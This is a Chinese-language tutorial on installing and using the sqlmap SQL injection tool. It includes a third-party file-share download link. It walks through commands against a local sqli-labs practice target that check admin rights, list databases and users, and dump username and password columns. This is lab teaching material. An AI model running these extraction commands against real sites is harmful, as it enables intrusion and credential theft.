SQLMAP
-
-
- 一、SqlMap介绍
- 二、SqlMap安装
- 三、SqlMap的基本操作
-
- 基本参数
-
- 1.打开sqli-labs的第一关,找到注入点
- 2.运行SqlMap,输入sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" 回车。
- 3.查看当前用户权限
- 4.查看所有数据库
- 5.查看当前网站数据库
- 6.查看当前网站连接用户
- 7.列出这些用户对应的密码
- 8.列出当前数据库有哪些表
- 9.指定某数据库某表的列名
- 10.最后就是列出指定列的数据
-
一、SqlMap介绍
- sqlmap是由Python编写语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。
- 它能检测的数据库:Access、MSSQL、MySQL、Oracle、 postgresql、db2、sqlite。
- 可以进行 sql盲注、union查询、显错注入、延迟注入、post注入、 cookie注入等
二、SqlMap安装
链接:https://pan.baidu.com/s/1CVAFLiLbVaoEKmwSEQPgjg
提取码:vjx9
由于是Python编写语言编写的工具,所以需要Python环境,已提供Python2.7版本,安装即可

1.下载解压后将解压包放在Python安装目录下
2.在桌面右键,新建快捷方式
3.输入快捷方式的名称
4.复制Python27下sqlmap的路径,右键快捷方式——属性——修改起始位置
5.双击运行快捷方式,输入sqlmap.py -v 查看版本,界面如下即安装成功
三、SqlMap的基本操作
基本参数
--is-dba 当前用户权限
--dbs 所有数据库
--current-db 网站当前连接数据库
--users 所有数据库用户
--current-user 当前数据库用户
--tables 列表名
--columns 列字段
--dump 获取表中的数据,包含列
--level 测试等级(1-5),默认为1
-D 指定数据库
-T 指定表
-C 指定列
1.打开sqli-labs的第一关,找到注入点
2.运行SqlMap,输入sqlmap.py -u “http://localhost/sqli-labs/Less-1/?id=1” 回车。
测出的信息提示存在
1.布尔盲注
2.显错注入
3.时间盲注
4.union查询
数据库是MySQL
系统为Windows
PHP,Apache,MySQL版本信息等。
3.查看当前用户权限
--is-dba
当前用户是管理员(当前权限很大)
4.查看所有数据库
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs
5.查看当前网站数据库
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db
6.查看当前网站连接用户
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-user
7.列出这些用户对应的密码
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --password
8.列出当前数据库有哪些表
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --tables -D security
–tables -D security:查看security数据库的表
9.指定某数据库某表的列名
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --columns -T users -D security
10.最后就是列出指定列的数据
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dump -C password,username --columns -T users -D security
总结流程:读取数据库—>读取表—>读取表列—>读取内容
欢迎交流WX:YX_NiMing